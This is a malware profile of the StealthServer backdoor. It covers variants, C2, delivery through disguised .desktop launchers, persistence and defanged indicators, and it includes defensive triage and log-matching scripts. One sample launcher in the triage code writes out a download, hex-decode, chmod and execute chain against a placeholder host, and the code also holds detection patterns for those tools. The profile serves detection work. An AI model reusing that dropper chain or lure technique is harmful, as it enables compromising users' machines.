StealthServer
StealthServer is a Golang backdoor family with Windows and Linux variants, observed in campaigns against entities in a South Asian country and assessed in public reporting as likely linked to APT36 (Transparent Tribe) on the basis of overlapping TTPs and infrastructure patterns. It is described as a cross-platform backdoor and, in related reporting, as a Windows variant of DeskRAT.
Its core capabilities are executing arbitrary commands received from command-and-control infrastructure and exfiltrating files from compromised hosts. Reported command sets differ by variant: Windows variants use LIST, UPLOAD, and DOWNLOAD; the Linux HTTP variant uses browse, upload, and execute; and the Linux WebSocket variant uses browse_files, upload_execute, start_collection, ping, welcome, and heartbeat. Linux file collection reportedly walks the filesystem recursively from / looking for documents and archives with the extensions .pdf, .doc, .xls, .ppt, .txt, .zip, and .rar. One Linux variant uploads the collected files as AES-GCM-encrypted HTTP POST requests carrying X-Username, X-File-Name, and X-Nonce headers; because the headers are sent in the clear, that triple is a usable network signature wherever the traffic is visible in plaintext or after TLS inspection, even though the body is encrypted.
Multiple iterative variants were reported. Windows variants moved from plaintext TCP JSON communications to XOR-obfuscated TCP and then to WebSocket C2. Linux variants appeared in both HTTP- and WebSocket-based implementations. Anti-analysis features include junk-code and dummy-function insertion, VM/sandbox and debugger checks, and traffic-noise generation through repeated requests to benign domains such as google.com and microsoft.com; one Windows variant also contacted cloudflare.com, amazon.com, facebook.com, and httpbin.org. These benign requests are deliberate noise and should not be treated as indicators on their own.
Observed delivery relied on phishing lures posing as PDF-related files that opened a decoy document while executing the payload silently. On Windows, delivery included a malicious macro-enabled PowerPoint add-in, "PM & Est Sanction Final 2025.ppam." On Linux, delivery commonly used malicious .desktop launcher files such as "Meeting_Ltr_ID1543ops.pdf.desktop" and "PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop," whose Exec entries opened a decoy PDF and fetched a hex-encoded ELF payload that was converted back to a binary with xxd and executed. Most Linux file managers display a launcher by its Name key rather than its real filename, so the trailing .desktop is hidden from the target. Decoy content reportedly referenced political, military, procurement, or conference themes, and decoys were commonly hosted on Google Drive.
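The following triage script is an added example written for this profile; it is not code from the reporting or from the malware. It checks a .desktop launcher for the traits attributed to the family's Linux droppers: a document double extension in the filename, a Name key that poses as a document while Type is Application, and an Exec chain that downloads content, hex-decodes it with xxd, marks it executable and runs it. The sample launcher is constructed for illustration; its URL (example.invalid) and file paths are placeholders, not indicators from the reporting.

```python
"""Triage a Linux .desktop launcher for the StealthServer delivery pattern.

Added example, not code from the reporting or from the malware. The sample
launcher below is constructed; its URL and paths are placeholders.
"""
import configparser
import re
import shlex
from dataclasses import dataclass, field

DOC_EXT = r"\.(pdf|docx?|xlsx?|pptx?|txt)"
DOUBLE_EXT_RE = re.compile(DOC_EXT + r"\.desktop$", re.IGNORECASE)
DOC_NAME_RE = re.compile(DOC_EXT + r"$", re.IGNORECASE)

# (label, regex applied to the shell command actually run by Exec=)
EXEC_CHECKS = [
    ("downloads a remote payload", re.compile(r"\b(curl|wget)\b")),
    ("hex-decodes with xxd", re.compile(r"\bxxd\b[^;&|]*-r")),
    ("marks a file executable", re.compile(r"\bchmod\b[^;&|]*\+x")),
    ("opens a decoy document", re.compile(r"\b(xdg-open|evince|okular)\b[^;&|]*\.pdf")),
    ("writes under /tmp, /dev/shm or a dotfile", re.compile(r"(/tmp/|/dev/shm/|\$HOME/\.|~/\.)")),
]
DROPPER_CHAIN = {"downloads a remote payload", "hex-decodes with xxd", "marks a file executable"}


@dataclass
class Verdict:
    suspicious: bool = False
    reasons: list = field(default_factory=list)
    command: str = ""


def parse_entry(text: str) -> dict:
    """Return the [Desktop Entry] group as a dict, keeping key case."""
    cp = configparser.RawConfigParser(strict=False, interpolation=None, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return dict(cp.items("Desktop Entry")) if cp.has_section("Desktop Entry") else {}


def effective_command(exec_value: str) -> str:
    """Unwrap `sh -c "..."` / `bash -c "..."` so the inner script is inspected."""
    try:
        parts = shlex.split(exec_value)
    except ValueError:
        return exec_value
    if len(parts) >= 3 and parts[0].rsplit("/", 1)[-1] in ("sh", "bash", "dash") and parts[1] == "-c":
        return parts[2]
    return exec_value


def triage_desktop(filename: str, text: str) -> Verdict:
    v = Verdict()
    entry = parse_entry(text)
    if DOUBLE_EXT_RE.search(filename):
        v.reasons.append("document double extension in filename")
    if DOC_NAME_RE.search(entry.get("Name", "")) and entry.get("Type", "") == "Application":
        v.reasons.append("Name key poses as a document while Type is Application")
    v.command = effective_command(entry.get("Exec", ""))
    for label, rx in EXEC_CHECKS:
        if rx.search(v.command):
            v.reasons.append(label)
    # Naming tricks alone are weak evidence; the download/decode/execute chain is the tell.
    hits = DROPPER_CHAIN & set(v.reasons)
    v.suspicious = "hex-decodes with xxd" in hits or len(hits) >= 2
    return v


# Constructed sample launcher (filename from the reporting; Exec contents are placeholders).
SAMPLE_NAME = "Meeting_Ltr_ID1543ops.pdf.desktop"
SAMPLE_TEXT = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "xdg-open https://example.invalid/decoy.pdf; curl -s https://example.invalid/stage.txt -o /tmp/.s.hex; xxd -r -p /tmp/.s.hex > /tmp/.s; chmod +x /tmp/.s; /tmp/.s"
"""

# Constructed benign launcher for comparison.
BENIGN_NAME = "firefox.desktop"
BENIGN_TEXT = """[Desktop Entry]
Type=Application
Name=Firefox Web Browser
Exec=firefox %u
Icon=firefox
"""

if __name__ == "__main__":
    for name, text in ((SAMPLE_NAME, SAMPLE_TEXT), (BENIGN_NAME, BENIGN_TEXT)):
        verdict = triage_desktop(name, text)
        print(name, "SUSPICIOUS" if verdict.suspicious else "clean", verdict.reasons)
```

Run it over ~/.local/share/applications, ~/Desktop and ~/Downloads on a suspected host; the unwrapping step matters because the reported launchers hide the whole chain inside a single `bash -c` string, which a naive grep on the Exec key would treat as one opaque token.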
Persistence was reported on both platforms. Windows variants copied themselves to %APPDATA% as nodejs.exe, set hidden and system attributes on the copy, added a Run key entry, created a Startup-folder shortcut, and created and started a service named "NodeJSUpdater" with display name "Node.js Background Updater." Related reporting also mentions PowerShell-based persistence. Linux persistence used systemd user services, crontab @reboot entries, and bash profile modifications.
Reported infrastructure and IoCs (kept defanged as published):
C2 domains: modindia[.]serveminecraft.net, modgovindia[.]space, kavach[.]space, seemysitelive[.]store, sinjita[.]store, sinjita[.]space, solarwindturbine[.]site, windturbine[.]website, seeconnectionalive[.]website, discoverlive[.]site, and cloudstore[.]cam.
IPs: 101.99.94[.]109, 45.155.54[.]122, and 45.155.54[.]62.
C2 endpoints: Windows-V3 WebSocket ws://kavach[.]space:5500; Linux-V1 HTTP modgovindia[.]space:4000 with paths /health, /commands, and /command-response; Linux-V2 WebSocket ws://seemysitelive[.]store:8080/ws.
Staging: https://securestore[.]cv/ghg/Mt_dated_29.txt and filestore[.]space-hosted payload and decoy paths.
Go build/source path artifacts: D:/bossmaya/newblkul/client/client_obfuscated.go and D:/bossmaya/client/obfuscated_client.go.
Asset searches reportedly found live admin pages titled "Stealth Server - Login."
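The matcher below is an added example for this profile, not code from the reporting. It refangs the indicators listed above and scans log lines for three kinds of evidence described on this page: network IoCs (domains, IPs, and the variant-specific C2 ports and paths), the X-Username / X-File-Name / X-Nonce upload header triple of the Linux HTTP variant, and the Windows persistence artifacts (the NodeJSUpdater service, its display name, and nodejs.exe under %APPDATA%). The log lines are constructed to exercise each match type and are not real telemetry; the formats (a Zeek-style HTTP record, a proxy line, a Sysmon-style service-install event, a connection summary) are assumptions. Domain matching is exact or on subdomains of a listed domain, so the dynamic-DNS parent serveminecraft.net is not matched on its own.

```python
"""Match StealthServer indicators from the profile against log lines.

Added example, not from the reporting. Indicators are copied from the profile in
their defanged form and refanged at run time; sample log lines are constructed.
"""
import ipaddress
import re
from collections import defaultdict

DEFANGED_DOMAINS = [
    "modindia[.]serveminecraft.net", "modgovindia[.]space", "kavach[.]space",
    "seemysitelive[.]store", "sinjita[.]store", "sinjita[.]space",
    "solarwindturbine[.]site", "windturbine[.]website", "seeconnectionalive[.]website",
    "discoverlive[.]site", "cloudstore[.]cam", "securestore[.]cv", "filestore[.]space",
]
DEFANGED_IPS = ["101.99.94[.]109", "45.155.54[.]122", "45.155.54[.]62"]


def refang(indicator: str) -> str:
    """Undo common defanging: [.] -> . , hxxp -> http, [:] -> :."""
    return (indicator.replace("[.]", ".").replace("(.)", ".")
            .replace("hxxp", "http").replace("[:]", ":"))


DOMAINS = {refang(d).lower() for d in DEFANGED_DOMAINS}
IPS = {ipaddress.ip_address(refang(i)) for i in DEFANGED_IPS}

# Variant-specific endpoints from the profile: Linux-V1 HTTP on :4000,
# Linux-V2 WebSocket /ws on :8080, Windows-V3 WebSocket on :5500.
C2_ENDPOINTS = re.compile(r":(4000)/(health|commands|command-response)\b|:(8080)/ws\b|:(5500)\b")
# Upload header triple of the Linux HTTP variant (compared case-insensitively).
EXFIL_HEADERS = ("x-username", "x-file-name", "x-nonce")
# Windows persistence artifacts.
HOST_ARTIFACTS = [
    ("service name NodeJSUpdater", re.compile(r"\bNodeJSUpdater\b")),
    ("service display name Node.js Background Updater", re.compile(r"Node\.js Background Updater")),
    ("nodejs.exe under %APPDATA%", re.compile(r"(?i)appdata\\(roaming\\)?nodejs\.exe")),
]

HOST_RE = re.compile(r"(?<![\w.-])((?:[a-z0-9-]+\.)+[a-z]{2,})(?![\w-])", re.I)
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def scan_line(line: str) -> dict:
    """Return {category: [details]} for every indicator hit in one log line."""
    hits = defaultdict(list)
    low = line.lower()
    for host in sorted({h.lower() for h in HOST_RE.findall(line)}):
        if any(host == d or host.endswith("." + d) for d in DOMAINS):
            hits["domain"].append(host)
    for raw in IP_RE.findall(line):
        try:
            ip = ipaddress.ip_address(raw)
        except ValueError:
            continue
        if ip in IPS:
            hits["ip"].append(str(ip))
    m = C2_ENDPOINTS.search(low)
    if m:
        hits["c2_endpoint"].append(m.group(0))
    if all(h in low for h in EXFIL_HEADERS):
        hits["exfil_headers"].append("X-Username/X-File-Name/X-Nonce")
    for label, rx in HOST_ARTIFACTS:
        if rx.search(line):
            hits["host_artifact"].append(label)
    return dict(hits)


def scan(lines):
    """Return (index, line, hits) for every line with at least one hit."""
    return [(i, ln, h) for i, ln in enumerate(lines) if (h := scan_line(ln))]


# Constructed sample telemetry (formats assumed; addresses from the profile, the rest invented).
SAMPLE_LOGS = [
    # Zeek-style http.log: Linux-V1 poll of the command endpoint
    "1718000000.1 CxYz http 10.0.0.7 52144 101.99.94.109 4000 GET modgovindia.space /commands http://modgovindia.space:4000/commands",
    # Proxy line: exfil POST carrying the upload header triple to an unlisted host
    'POST https://example.invalid/upload 200 hdrs="X-Username: ops; X-File-Name: plan.xlsx; X-Nonce: 8f2a"',
    # Sysmon-style event: service install on a Windows host
    "EventID=7045 ServiceName=NodeJSUpdater DisplayName=Node.js Background Updater ImagePath=C:\\Users\\u\\AppData\\Roaming\\nodejs.exe",
    # Decoy noise the family generates itself; must not fire
    "1718000001.2 CxAb dns 10.0.0.7 51000 8.8.8.8 53 google.com A 142.250.0.1",
    # Connection summary: Windows-V3 WebSocket C2
    "conn 10.0.0.9 -> 45.155.54.62:5500 ws://kavach.space:5500",
]

if __name__ == "__main__":
    for idx, line, hits in scan(SAMPLE_LOGS):
        print(idx, hits)
```

The exfil-header check fires without any listed domain in the line, which is the intended behaviour: the upload host can change between campaigns while the header names stay with the code. The google.com decoy line produces no hit, consistent with the anti-analysis noise described above.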
Recent activity
5 sources tracked across advisories, community write-ups, and news.
Windows variant of DeskRAT, featuring anti-analysis techniques, PowerShell-based persistence, and support for TCP or WebSocket communications. Used for espionage and persistent access.
StealthServer is a Golang-based backdoor with variants for both Windows and Linux. It supports file enumeration, upload/download, execution of commands, and uses various C2 protocols (TCP, WebSocket, HTTP). It features anti-analysis techniques and multiple persistence mechanisms.
Backdoor used by APT36 (Transparent Tribe) for espionage operations (specific capabilities not described in the content).